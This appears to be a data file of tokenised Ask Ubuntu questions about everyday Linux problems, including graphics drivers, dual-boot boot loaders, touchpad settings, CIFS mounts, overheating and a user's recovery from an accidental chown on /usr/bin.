264683	alt + tab to switch between windows that are only in one screen	i am using gnome-classic and my window switcher is the compiz static application switcher . my problem is , when i press alt+tab , the switcher gives me the choice between windows of the whole workspace . so if i have one terminal opened in the first screen , and one terminal open in the second one , i ca n't know which one is selected and open the bad one 50 % of the time . on my older ubuntu version ( 10.10 ) , i had n't such a problem , so i think there may be a solution to avoid it . i found in this post that this is not possible to have one workspace/screen , so there 's probably something i miss somewhere else . edit ( summary ) : when i do alt+tab in one screen , i want to only see the windows i have in that screen , not the other one .
264691	full disk encryption - adding disk	i 've installed ubuntu 12.04 server using the encrypted volume with lvm option . i 've now added another harddrive , that i wish to encrypt using the same key - and only supply key once during boot . how can i accomplish this ?
264692	ubuntu 12.04 installation problem	i have a gtx580 and i installed ubuntu 12.04 using the nomodeset option . now when i start the pc , in the login screen i ca n't move my mouse and then a black screen appears and the following message is repeated : gpu lockup - switching to software fbcon failed to idle channel 1 pipfo playlist update failed i know i have to install the nvdia drivers but , how can i access the terminal ? ( ctrl + alt + f1 does n't work )
264712	ubuntu installer does n't start from a separate iso partition [ unetbootin ]	my pc does n't have a working cd drive and the bios is too old to boot from usb drives . it has windows 7 installed . i 've split the hard drive into 2 partitions with the first one ( h : ) being ntfs and the second ( i : ) being fat32 . i 've used unetbootin ( an older version of it that has the `` show all drives option '' , since the latest one does n't detect the i : drive for some reason ) to download ubuntu 10.04 netinstall to the drive i : . the procedure seemed to have went fine , but there is an issue . when i reboot the computer i do n't see an option to choose oss ( windows 7 boots up immediately ) and the ubuntu installer is not available as an option anywhere . it is as if the second partition is not detected at all ( although i can see it in my computer and browse its contents ) . if i go to the bios advanced settings and try to reorder the boot sequence there is only one hard drive option , that is my whole hard drive , unpartitioned ( along with many others such as cd-rom , usb-fdd , flash drive , lan , etc ) . i am guessing there is some kind of an issue with the windows mbr , but if i remember correctly that should only be touched when i successfully install both oss ( since the second partition does n't contain a real os at the moment , only the ubuntu installer ) my main goal is to get rid of windows alltogether and have a single ubuntu drive .
264713	dell studio 1749 i5 overheats with ubuntu	i 've dell 1749 with intel i5 430m , ati 5000hd and 8gb ram , so i thought that ubuntu would work without problems but temperature is about 70-80c when i 'm normally using ( firefox , thunderbird ) . during playing temperature grow up to 95c ! kernel 3.5.26 , drivers fglrx-updates ( required trough steam ) . have you any solution for this ? ps -eo pcpu , pid , args | sort -k 1 -r | head -15 % cpu pid command 7.1 4405 /usr/bin/dpkg 6.0 1122 /usr/bin/x :0 -core -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch -background none 4.2 1774 compiz 3.5 20516 /usr/bin/python3 /usr/bin/update-manager 16.7 22339 /usr/lib/firefox/firefox 1.6 20346 /usr/bin/python3.2 /usr/sbin/aptd 0.5 1890 /usr/lib/unity/unity-panel-service 0.4 2205 update-notifier 0.4 1943 /usr/lib/indicator-appmenu/hud-service 0.3 1811 nautilus -n 0.2 995 /usr/lib/policykit-1/polkitd -- no-debug 0.2 940 dbus-daemon -- system -- fork 0.2 31752 gnome-terminal*strong text* 0.2 1880 /usr/bin/gtk-window-decorator
264716	how i can make gui of netbeans look darker ?	i have sensitive eyes . it is important for me - having everything dark in my monitor . for example , this is my eclipse . how i can make netbeans good for my eyes ? i work under linux , lubuntu . thank you very much for answers .
264717	make openstack store all instances on cinder	i have been messing around with openstack for a little time , setting up a test environment . one thing i never found out was how to store my instances on cinder ... does anyone here know how i can store all my instances on cinder instead of the compute host ... ?
264719	how to install parallels workstation in ubuntu 12.10 ?	is there a way to install parallels workstation on lastest ubuntu 12.10 ?
264721	how to customize mouse click ?	i would like to open everything in one mouse click . where is the setting to do this ?
264726	adbd can not run as root in production builds	i am trying to install ubuntu touch on my galaxy nexus , but it says adbd can not run as root in production builds . i tried a lot of stuff , including a few instructions from ask ubuntu , nothing helps . can anybody please advise on what can be my problem ?
264732	ca n't set synaptics `` tapbutton '' options in 12.04 lts	i have recently upgraded my netbook from ubuntu 11.04 to 12.04 lts . since the upgrade - in fact , possibly since the upgrade to 11.10 - the system no longer registers touchpad taps as mouse clicks ( except , bizarrely enough , in a couple of very limited cases ) . this feature worked perfectly in 11.04 , ( and before that , in eeebuntu based on jaunty , ) and i ca n't get used to working without it . other advanced touchpad options , like two-finger scrolling , work perfectly . `` enable mouse clicks with touchpad '' is enabled in system settings . in the gpointing device settings gui , tapping likewise appears enabled . here is the output of `` synclient '' : parameter settings : leftedge = 1775 rightedge = 5505 topedge = 1648 bottomedge = 4602 fingerlow = 25 fingerhigh = 30 fingerpress = 256 maxtaptime = 350 maxtapmove = 350 maxdoubletaptime = 180 singletaptimeout = 180 clicktime = 100 fasttaps = 0 emulatemidbuttontime = 75 emulatetwofingerminz = 282 emulatetwofingerminw = 7 vertscrolldelta = 110 horizscrolldelta = 110 vertedgescroll = 0 horizedgescroll = 0 cornercoasting = 0 verttwofingerscroll = 1 horiztwofingerscroll = 1 minspeed = 1 maxspeed = 1.75 accelfactor = 0.0361598 trackstickspeed = 40 edgemotionminz = 30 edgemotionmaxz = 160 edgemotionminspeed = 1 edgemotionmaxspeed = 442 edgemotionusealways = 0 touchpadoff = 0 lockeddrags = 1 lockeddragtimeout = 550 rtcornerbutton = 0 rbcornerbutton = 0 ltcornerbutton = -70 lbcornerbutton = 8 tapbutton1 = 0 tapbutton2 = 0 tapbutton3 = 0 clickfinger1 = 0 clickfinger2 = 0 clickfinger3 = 0 circularscrolling = 0 circscrolldelta = 0.1 circscrolltrigger = 0 circularpad = 0 palmdetect = 0 palmminwidth = 10 palmminz = 200 coastingspeed = 20 coastingfriction = 50 pressuremotionminz = 30 pressuremotionmaxz = 160 pressuremotionminfactor = 1 pressuremotionmaxfactor = 1 resolutiondetect = 1 grabeventdevice = 1 tapanddraggesture = 1 arealeftedge = 0 arearightedge = 0 areatopedge = 0 areabottomedge = 0 horizhysteresis = 27 verthysteresis = 27 clickpad = 0 now the bizarre part : `` synclient tapbutton1=1 '' has no effect whatsoever . i can set other variables but not tapbutton1 , tapbutton2 or tapbutton3 . what 's wrong ? and how can it be fixed ?
264733	openjdk built in ubuntu 12.10 , but not working ?	i recently installed ubuntu 12.10 , and i just now realized i have n't installed java on it . when i was going to , i saw that i already have java installed . java -version gives me : openjdk runtime environment ( icedtea7 2.3.7 ) ( 7u15-2.3.7-0ubuntu1~12.10 ) openjdk 64-bit server vm ( build 23.7-b01 , mixed mode ) yet i ca n't see any applets in firefox . what 's the problem ?
264748	why i ca n't login with admin accounts but i can with guest account ?	ubuntu 12.04 is installed on my laptop . it was working fine from last 3 years suddenly from last few days , whenever i wan na login into admin account it logs and log out immediately . i can login using guest account with gui . i can log in in admin account in cui but not in gui . even if i create any admin account it does the same .
264749	installing ubuntu 12.10 + windows 8 in ssd+normal drives	i 'm gon na setup my computer with a new hd config . i have a 320gb old sata2 drive with ubuntu 12.10 + windows 7 . i 'm buying a new 120gb ssd drive today , and my plan is as follows : ssd - 20gb partition for ubuntu 12.10 / partition - rest for windows 8 old sata2 - 120gb for /home ubuntu 12.10 partition . - rest for windows 8 my questions are : - i have 4gb ram . should i create a swap partition ? if i need to , wher should be the best place , ssd or mechanical drive ? - i guess i should install windows 8 first to avoid w8 stepping onto grub ? - is it easy to setup ubuntu to use / in one disk and /home in another ? thanks in advance !
264750	how to get the last version of ekiga ?	ubuntu software center currently provides only version 3.2.6 of ekiga , but that is outdated . is there a way to have it updated ?
264753	can not boot into ubuntu 12.04 after reinstalling windows 7	i had to reinstall my windows 7 due to some problems , before that i was running a dual boot with ubuntu 12.04 , which was originally installed from windows ( via wubi ) in a separate partition . after reinstalling windows the screen where i could choose the os to boot to was gone , i searched for a solution and installed easybcd , from there installed neogrub , added an entry for ubuntu ( tried type grub2 and grub legacy , nothing changed ) . now i get to windows boot manager after rebooting , but if i choose ubuntu it says 'windows was not installed correctly ' , so clearly something is wrong . this is the boot menu : there are a total of 3 entries listed in the bootloader . default : windows 7 timeout : 15 seconds boot drive : c : \ entry # 1 name : windows 7 bcd id : { current } drive : c : \ bootloader path : \windows\system32\winload.exe entry # 2 name : neogrub bootloader bcd id : { 8355e9dd-8693-11e2-94ba-98e0820b23a5 } drive : c : \ bootloader path : \nst\neogrub.mbr entry # 3 name : ubuntu bcd id : { 8355e9df-8693-11e2-94ba-98e0820b23a5 } drive : e : \ bootloader path : \nst\autoneogrub0.mbr i`m no expert , but the bootloader path for entry # 3 looks wrong , however i do n't know how to change it ( or what should i change it to ) . now i realised i should have installed ubuntu from a live cd not wubi , but it 's too late for that . i 'm thinking there has to be some way to acces ubuntu , cause it`s all there in its partition . edit : i tried running wubi to refresh my memory , now i remember what i did , i changed the 'installation drive ' from c to e , which is a partition i created just for ubuntu and which is still there , unformatted .
264758	nvidia drivers on ubuntu 12.10 do n't work on my mac mini	i have a 2009 mac mini with a core 2 duo processor . i got fed up of macos so i installed ubuntu 12.10 hoping to get some welcome relief . the `` standard '' ( i 'm not a linux expert ) drivers gave me multiple screens and proper resolution , but the image would go all wonky and pixelated at times ( techspeak . lol ) . we downloaded and installed nvidia drivers and bumblee expecting that to solve the problem . instead i just got the desktop icons and no dock . so we went back to the x.org x server drivers and now it only detects one screen and does n't give me full resolution . anyone have any suggestions please ? thanks a lot . tony
264759	screen / graphics lag on ubuntu 12.10 on alienware m14x r2	i 'm new to ubuntu so please forgive my ignorance . i recently bought an alienware m14x r2 with a '1gb gddr5 nvidia速 geforce速 gt 650m ' vide card . i followed this tutorial to installed ubuntu 12.10 on virtualbox 4.2.8 but am experiencing serious screen/graphics lag . the host sytem is windows 7 & i have a intel i7-3630qm processor . so far i 've tried : installing virtualbox guest additions from the vb device menu , the installtion completed succesfully but did not resolve the screen lag issue . i installed bumblebee as descibed in their wiki . it seemed to install correctly but after reboot did nothing . the terminal commands where : sudo add-apt-repository ppa : bumblebee/stable sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update then i tried to install the guest additions on the ubuntu cli as described here : upubuntu.com/2012/08/how-to-install-virtualbox-guest.html . again this installed correctly but did nothing after reboot . the terminal commands where : sudo apt-get install virtualbox-guest-additions sudo apt-get install virtualbox-guest-dkms virtualbox-guest-x11 virtualbox-guest-utils then in desporation i enabled 3d acceleration in the virtualbox display settings , but this seemed to do nothing . finally in a last ditch effort i enabled io apic in the virtual box system setting & increased the number of processors to 4 cpus . this improved the screen lag a fair bit but not entirely & i still ca n't switch to seamless mode . i 'm not really sure if it 's the correct resolution as i do n't know if i have hardware virtulization which i 've read is required for this . is this the correct solution or should i try something else , perhaps i need to remove some of the repositories added & start over but i 'm unsure how to do this ? any help/advice would be much appreciated , i 'd be happy to add more detail if needed . thanks
264761	ubuntu 12.10 high temperature	i have an hp g6 with ubuntu 12.10 ( 64 ) , when i watch a flash in full screen or play even a small ubuntu game like chess , the temperature goes to 80-90 degrees , normal browsing temperatures 64-70 , i have a dual gpu , i read a lot of posts here and in ubuntu forums and now im lost dont know what to do , i 've read about vgaswitcheroo but i cant manage to install or enable it , changing gpu from the catalyst to power saving doesnt help , please someone advise . root @ simo : / # lspci 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.1 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 2 ( rev b5 ) 00:1c.2 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 3 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm65 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati caicos [ radeon hd 6400m/7400m series ] 02:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 04:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5209 pci express card reader ( rev 01 ) root @ simo : / # fglrxinfo display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : amd radeon hd 6400m series opengl version string : 4.2.12002 compatibility profile context 9.012 simo @ simo : ~ $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati caicos [ radeon hd 6400m/7400m series ] simo @ simo : ~ $ grep -i switcheroo /boot/config-* /boot/config-3.2.0-38-generic : config_vga_switcheroo=y /boot/config-3.5.0-25-generic : config_vga_switcheroo=y simo @ simo : ~ $ root @ simo : / # ls -l /sys/kernel/debug/vgaswitcheroo/switch ls : can not access /sys/kernel/debug/vgaswitcheroo/switch : no such file or directory root @ simo : / #
264762	is there a standard package that provide latitude/longitude functions in python ?	i 'm trying to develop software in python that involves geographic coordinates . i 'd prefer to not rely on custom installed software , and only rely on standard packages . so far , i 've only found geopy hosted at google , which should be useful ( it actually provides way more than i need ) . are there any python packages that i should be looking at ?
264764	how can i install packages from debian 's squeeze repo on ubuntu 12.10 ?	i am using debian squeeze but i want to test ubuntu with unity . i just downloaded ubuntu 12.10 iso and installed it , but i ca n't find a way to add debian 's local repository . how can i use debian 's dvd repo with ubuntu 12.10 ?
264768	how to configure static ip in ubuntu running on virtual box ?	i am using ubuntu on virtualbox in dell laptop and wanted to know how i can configure the static ip in ubuntu so that i can browse internet on ubuntu and also use putty . i am using data card for internet . currently in /etc/network/interfaces the settings is as follows : iface eth0 inet dhcp
264770	slow reboot and logout in gnome3 , normal from terminal	my ubuntu 12.10 computer running gnome shell rather than unity , is now very slow to logout or reboot from desktop . it reverts to generic ubuntu icon theme , and the screen goes dim . programs can still be opened from docky , but gnome shell is unresponsive . after 30 sec to 1 min , it will logout or reboot without warning . there is apparently nothing taking up the system . when i run sudo reboot from the terminal , it just does it , with none of this dillydallying .
264776	x11 forwarding issue ubuntu 12.10 from aix	using ubuntu 12.10 and have putty installed , i am using ssh /putty to connect an aix system once i do that i export the display and run something simple like 'xclock ' or 'xterm' problem is its not working , i get the following 'error : ca n't open display : ' i have checked on the server side and on my laptop to make sure x11forwarding is enabled and it is within putty , ssh_config ( local ) : forwardx11 yes forwardx11trusted yes sshd_config ( aix server ) : x11forwarding yes i have tried connecting through putty , and from the cli ssh -x user @ < aix_server > but no matter what i try i get the : error : ca n't open display : message this was working for me , but not since i have migrated to 12.10 anyone out there come across this before have any suggestions ? edit the below is from aix after i login using putty : echo $ display xclock error : ca n't open display : $
264778	how to re-enable hibernate option ?	i had enabled `` hibernate '' option in my ubuntu 12.10 few months back by adding the following lines to /etc/polkit-1/localauthority/50-local.d/com.ubuntu.enable-hibernate.pkla : [ re-enable hibernate by default ] identity=unix-user : * action=org.freedesktop.upower.hibernate resultactive=yes however , i do n't know how , rather do n't remember what led to it being disabled both in `` power options '' and in the `` gear icon '' on the menu bar . the file is still intact . one of the things i suspect is removing old kernels using ubuntu tweak , but have no valid reason to allege this : p
264780	ubuntu does n't show up on the boot menu	i just installed ubuntu alongside windows 7 from a flash drive . it said it installed properly and that i needed to restart . but when i did i never got the option to boot to ubuntu and even when i pull up the boot list on start up it only shows windows 7 with no option for ubuntu . edit : added what i installed it from .
264781	running binary from shell script creates core ?	i am facing an issue when i am running my executable ( binary program ) from the shell , its running fine . but when i run that executable from shell script then that executable creates core dump . for example : if i run the test executable from prompt with arugments like : test args it runs fine . but now , i create a script a.ksh : # /bin/ksh cd path_to_executable result=test args and then runs ./a.ksh and it crash and creates a core dump . any thoughts why running an binary from shell script creating core ?
264783	keyboard shortcut for multiple monitors	is there a keyboard shortcut for switching focus from one monitor to the next in unity ? basically , if i am working on my web-browser on my right screen , how can i switch to my terminal on my left screen ?
264786	how to reset config files to default , especially boot sequence	is there a way to reset all ubuntu config files , a batch procedure ? . no the local config files , i mean all /etc config files . i know how to do that one by one but that is a job for weeks or work .
264790	system-is -running-in-low-graphics on installing ubuntu	i get this error on just trying to install a clean install of ubuntu , i want to reformat the drive and install but can not due to this video issue how can i resolve it ? how to fix `` the system is running in low-graphics mode '' error ? i686 intel p4 1.4 ghz 256 mb ram ati rage fury 128 pro i get a black screen .
264792	problems with cifs and fstab	something altered my fstab and my nas drives stopped loading properly at startup or when i run mount -a. i see : mount error ( 13 ) : permission denied i 'm running 12.04 . here 's what i in my fstab //192.168.0.40/data /media/nas-data cifs credentials=/etc/nas.txt 0 0 1 ) i can verify that my credentials are where they 've always been ( nothing changed there ) 2 ) i have cifs-utils and smbfs installed 3 ) i 'd previously had the drives mounting via smbfs but changed the fstab line to cifs
264793	black screen when watching a video on youtube	when i attempt to watch a youtube video , on my compaq presario 700 , os : ubuntu 11.1 , all i can see is a black screen . there is no message regarding adobe or any other thing , all i get is a black screen . i have gone to ubuntu software center and added both the adobe plugin , and the adobe 10.0 which is subsequently listed in the ubuntu software center as adobe 11 . in both of those scenarios i have also added the add-ons they recommended . i also removed them before adding the other adobe . i also tried adding light spark . none of this has resolved this . does anyone know of any other means or software that i can access so i can watch youtube videos or any other videos i might want to watch ? thank you very much .
264794	i installed ubuntu and now my windows 7 is gone	i just downloaded ubuntu yesterday then i installed it ( ubuntu 12.10 i did not do any partitions just automatic installing it is it completely gone ? uhm i have my games inside the c : \ i wanted to play it on ubuntu where can i find my games : ) please answer thank you : )
264799	microsoft wireless 5000 works and the stops on ubuntu 12.10	i 've never used a linux system before but have always wanted to learn so i 've just installed ubuntu 12.10 on my system and all seems to be running well , apart from the microsoft 5000 bluetrack keyboard and mouse set i have . they work well for a few minutes and then they just stop responding to anything at all . i am very new to the idea of linux and am still very much getting to grips with it , assume i do n't know anything at all before you suggest a soluton , so please list how to do it ! thanks
264810	how to resize a partition to the min-size via a script	i need to shrink my partition to min-size , like resize2fs -m /dev/sba6 but , it seems that resize2fs does not change the physical partition , just the structure of the filesystem . parted can resize the partitions but it requires start and end numbers .
264813	alternative to remmina	i often have to do some work from home , so i connect via vpn and rpd to my workplace ! unfortunately with remmina i can´t get altgr-shortcuts working , it doesn´t show textcursor in editors and the performance is also not very well which is really annoying when you have to work a few hours with it ! so does anyone know a better rdp-client for linux it doesn´t have to be opensource or free , i 'm willing to pay for a good rpd-client !
264814	brother mfc6490cw printer drivers	i have recently installed ubuntu 12.10 and can not get my brother mfc6490cw printer to work . when i try to install the device , ubuntu does not find a driver .
264819	how do i solve a problem with opening the application menu ?	i have a new problem that i ca n't find an answer to anywhere . i am running xubuntu 12.10 xfce . when i click on the top left icon , which is known as the application menu , it gives me this error : failed to load the applications menu : error on line 1 char 1 : document was empty or contained only whitespace . can someone please suggest any solutions for this problem .
264824	problem adding spellcheck dictionary to firefox	i 've tried to install finnish dictionary to the firefox several times by right clicking text area and choosing languages - > add dictionaries . however , every time i restart firefox , finnish is not listed as installed language . how can i fix this ? ubuntu 12.10 , firefox 19.0 .
264826	best way to apply boot options	i need to boot my computer with nolapic noapic and acpi=off . i can do it with the livecd but unless the flags are applied at boot on the harddrive the kernel panics and the system does n't boot ( so no graphics tools to install ) . what 's the best way to apply these settings on a fresh installation . i used to chroot into the install and tag them that way . for the last two releases i 've not been able to do this : ( .
264827	how do i activate a local caching nameserver ?	i want to have strong dns cache server on my local host ( server ) . so i need to change name server to my localhost . how can i change it ? byt this config it seems i must do n't change it via editor so how can i change it ? root @ asqar # cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 4.2.2.4 search asqar.net i 'm using bind9 how can i set the dns cache , any configure ?
264829	compiz does not work well	well this is the first time i 'm with ubuntu . the problem is that after installing compiz and extras , i can install the cube and some other elements . but there are problems with : 3d windows , paint fire , and water effect . 3d windows makes the cube unstable and the window effects do not work as the cube disappears . paint fire and water effect simply do not work . after reading and reading , i installed the proprietary drivers and checked 3d acceleration ; everything is correct , but those compiz effects still do not work . the card is an amd ati radeon hd 7400 ~ $ glxinfo | grep direct direct rendering : yes gl_amd_multi_draw_indirect , gl_amd_name_gen_delete , gl_arb_draw_indirect , gl_arb_draw_instanced , gl_ext_copy_buffer , gl_ext_copy_texture , gl_ext_direct_state_access , i do n't know what to do ... i don'w know if there is some incompatibility with unity , but i 've seen videos in which compiz is working perfectly well . thanks for the help , and if you need to know anything please ask . original post bueno , es la primera vez que estoy con ubuntu . el problema es que después de instalar compiz y los extras , puedo instalar el cubo y algunos otros elementos . pero el problema viene en las siguientes tareas : 3d windows , paint fire y water effect . 3d windows hace que el cubo no sea nada estable y no se llega a ver bien el efecto de las ventanas en 3d ya que el cubo desaparece . paint fire y water effect directamente no funcionan . despues de leer y leer he instalado los drivers privativos y comprobado la aceleración 3d : todo está correcto , pero aun así compiz no funciona . la tarjeta es una ati amd radeon hd 7400 ~ $ glxinfo | grep direct direct rendering : yes gl_amd_multi_draw_indirect , gl_amd_name_gen_delete , gl_arb_draw_indirect , gl_arb_draw_instanced , gl_ext_copy_buffer , gl_ext_copy_texture , gl_ext_direct_state_access , no sé qué hacer ... no sé si es por una incopatibilidad con unity , pero hay vídeos en los cuales se ve compiz funcionando perfectamente . gracias por la ayuda y si necesitan saber cualquier cosa pregunten tranquilamente .
264833	12.04 lts - display raw thumbnails in `` open file '' dialogs , also in explorers . how ?	been looking for an answer to this here and in google for two days . must have read dozens of articles and posts and tried most anything that seemed viable . i have installed gnome-raw-thumbnailer , ufraw , even kdegraphics-thumbnailers . nothing works . specifically , i need to be able to see thumbnails for rw2 ( panasonic ) files . moreover , i 'd like to enable the thumbs for some apps file selector dialogs . extremely grateful for any help . jorge .
264835	how do i know my system is broken after chown -r root usr/bin ?	this question is related to another question -- `` ca n't access any functions after chown command . '' -- but i think it may be worthy of an independent question . my question is : how do i know that my system is messed up and that i should probably re-install ? i already know that i made a huge stupid mistake , as is discussed on related question : ) here 's what i did : i wanted to learn a little about mysql . i know very little about databases and as you can tell from what i did , i know very little about linux . i was following instructions on this mysql tutorial page , accidentally ran the command : /usr/bin $ sudo chown -r root . after doing this , i realized my recklessness and naivete ( all criticisms duly received ) by getting the following error trying to run sudo : sudo : must be setuid root besides enjoying using linux , part of my reason for using it is to gain experience , and thus , this mistake was not a total disaster . all my data are in the cloud , so it will just be the several hours of reinstalling everything that will cost me . but before i reinstall , i want to know how i can tell that my system is messed up . i was able to fix the `` sudo problem '' with the following helpful article : http : //www.psychocats.net/ubuntu/fixsudo i booted in recovery mode ( by pressing shift during boot ) , i chose `` drop to root shell prompt , '' and then i think i ran the following commands : mount -o rw/remount / sudo chown root : root /usr/bin/sudo sudo chmod 4755 /usr/bin/sudo ( the last two commands based on this askbuntu answer . ) after doing so and rebooting , sudo now `` works '' again , and i do n't notice obvious problems with my system . however , as i have learned , my initial mistake changed ownership on the entire usr/bin directory and subdirectories . from what i hear , the best way to fix this is to reinstall the system and packages . but my question is : what kind of diagnostics can i do to know that my system is messed up from the ownership changes ? so far things seem to work fine , such as : chromium , python , gedit , and apt-get . if i had made a different bone-headed mistake , i may not know i have a problem , so i am curious about some kind of diagnostic things i could check and what my primary motivation for reinstalling ubuntu would be . i am currently using ubuntu 12.04 lts . thank you !
264837	how to enable compiz window grid with visual effects set to none . ubuntu 10.04	i have to disable `` visual effects '' ( system - > preferences- > appearance - > visual effects - > none ) because i get a terrible flicker/blinking when it is enabled , but i 'd really like to use compiz window grid shortcuts . they only work w/ visual effects set to `` extra '' . is there any way to specifically enable compiz grid functionality without turning on everything else that seems to bog down the grapics ? thanks .
264842	conky not showing desktop icons	i have installed the inifinity style to conky on my ubuntu 12.04 system using xfce4 as my wm and desktop . http : //www.unixmen.com/infinity-a-stunning-theme-for-conky-ubuntu-linuxmint-fedora/ it works fine , problem is that my desktop icons wo n't display . my .conkyrc file is here : # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # conky theme : infinity # # created by : harshit yadav # # version : 1.0 # # feel free to distribute # # for installation instrcutions see read me # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # conky settings # background yes update_interval 1 cpu_avg_samples 2 net_avg_samples 2 override_utf8_locale yes double_buffer yes no_buffers yes text_buffer_size 2048 # imlib_cache_size 0 temperature_unit fahrenheit # window specifications # own_window yes own_window_type override own_window_class conky own_window_transparent yes own_window_hints undecorate , sticky , skip_taskbar , skip_pager , below border_inner_margin 0 border_outer_margin 0 # # this resolution is set according to the sreen resolution of 1366x768 # # adjust accoring to yours minimum_size 1024 768 maximum_width 1024 alignment tr gap_x 10 gap_y 55 # graphics settings # draw_shades no draw_outline no draw_borders no draw_graph_borders no # text settings # use_xft yes xftfont caviar dreams : size=8 xftalpha 0.5 uppercase no temperature_unit celsius default_color ffffff # lua load # lua_load ~/.lua/scripts/haunted.lua lua_draw_hook_pre clock_rings # # adjust these fields according to the your screen size i have modded them for 1366x768 text $ { offset 600 } $ { color eaeaea } $ { font ge inspira : pixelsize=80 } $ { time % l : % m % p } $ { offset 650 } $ { font } $ { voffset -84 } $ { voffset 10 } $ { color ffa300 } $ { font ge inspira : pixelsize=42 } $ { time % d } $ { voffset -15 } $ { color eaeaea } $ { font ge inspira : pixelsize=22 } $ { time % b } $ { time % y } $ { font } $ { voffset 70 } $ { font ge inspira : pixelsize=58 } $ { offset -550 } $ { time % a } $ { font } $ { offset 650 } $ { voffset -100 } $ { font ubuntu : pixelsize=10 } $ { color ffa300 } hd $ { offset 9 } $ color $ { fs_free / } / $ { fs_size / } $ { offset 30 } $ { color ffa300 } ram $ { offset 9 } $ color $ mem / $ memmax $ { offset 30 } $ { color ffa300 } cpu $ { offset 9 } $ color $ { cpu cpu0 } % $ { voffset 10 } $ { offset 270 } $ { color 2c2c2c } $ { hr 4 } $ { image ~/.conky/rev-eng.png } $ { offset 130 } $ { voffset 222 } $ { font santana : size=9 : style=bold } root : $ { font santana : size=9 } $ { fs_used / } / $ { fs_size / } $ { offset 130 } $ { voffset 10 } $ { font santana : size=9 : style=bold } home : $ { font santana : size=9 } $ { fs_used /home } / $ { fs_size /home } $ font $ { offset 120 } $ { voffset 12 } $ { color ffffff } $ { font santana : size=9 : style=bold } swap : $ { font santana : size=8 } $ { swap } / $ { swapfree } $ font $ { offset 570 } $ { voffset -110 } $ { color eaeaea } linux $ { kernel } kernel $ { offset 570 } $ { voffset 5 } uptime : $ { uptime } $ { offset 825 } $ { voffset -80 } $ { color ffffff } $ { font santana : size=10 : style=bold } $ { exec whoami } @ $ { nodename } $ { offset 825 } $ { voffset 0 } $ { color ffffff } $ { font santana : size=8 } $ { top name 5 } $ { top mem 5 } $ { offset 700 } $ { voffset 130 } $ { color ffffff } $ { font santana : size=8 } ip address : $ { addr eth0 } $ { offset 705 } $ { voffset 10 } $ { color ffffff } $ { font santana : size=8 } down : $ { downspeed eth0 } k/s $ { offset 8 } up : $ { upspeed eth0 } k/s $ { offset 703 } $ { voffset 10 } $ { color ffffff } $ { font santana : size=8 } tcp connections : $ { tcp_portmon 1 65535 count } a lot of places on the net have suggested changing settings on the own_window_type override part , i have tried all 3 of them ; normal , desktop and override desktop and normal only display a black background and totally mask my desktop . while as override will at least display my wallpaper . if i right click on it anywhere it pops up my right click menu for the desktop . so it 's getting there but no icons . http : //i.imgur.com/stthsqp.png http : //i.imgur.com/zr9wbmp.png also if i right click on where an icon should be it display the popup menu for that file , so it works just does n't display .
264844	why is xrandr reporting a resolution just above the maximum ( native ) resolution ?	i have a bizarre issue with a lenovo e430 laptop . the lcd display is 1366x768 , but for some reason it always starts with a resolution of 1368x768 . this 2px overscan makes things jump all over the place when you approach the edge . xrandr does report that maximum size of the display to be 1368x768 , which is irritating to say the least . the software is just doing what it thinks is right , and defaulting to the largest supported resolution . is my only recourse using modelines ? i 'd prefer the hardware actually report correctly . ( who knows , it could be some hackjob of a 1368 panel.. )
264845	wifi painfully slow in quantal	i recently installed ubuntu 12.10 on the gnome3 desktop environment . i have a lenovo s10-2 netbook with the following specs : intel® atom™ cpu n280 @ 1.66ghz × 2 ram : 993.4 mib graphics : unknown ( on board ? ) ubuntu partition : 14 gb os type : 32 bit my wifi connection works fine ( using network manager ) and connects automatically without any hassle . however , my transfer speeds are extremely slow . its weird because some days ( very rarely ) i get speeds upto 60 kb/s and when downloading something via terminal , i sometimes get as much as 95-108 kb/s . but when i use transmission , the transfer speed for my torrent files stays painfully slow . as soon as i start downloading the torrent , the speed shoots up to 70-90 kb/s but then right away it drops down and stays at 15-28 kb/s . the first time i used rtorrent and downloaded a torrent via terminal , it downloaded @ 55-70 kb/s . but now , even rtorrent gives me the same speeds as transmission . the torrent i am downloading has plenty of seeds . in windows i get an average speed of 50 kb/s . but i hate windows . also , using transmission to download torrents absolutely brings page-loading in chromium to a screeching halt . so what should i do ? please help ! !
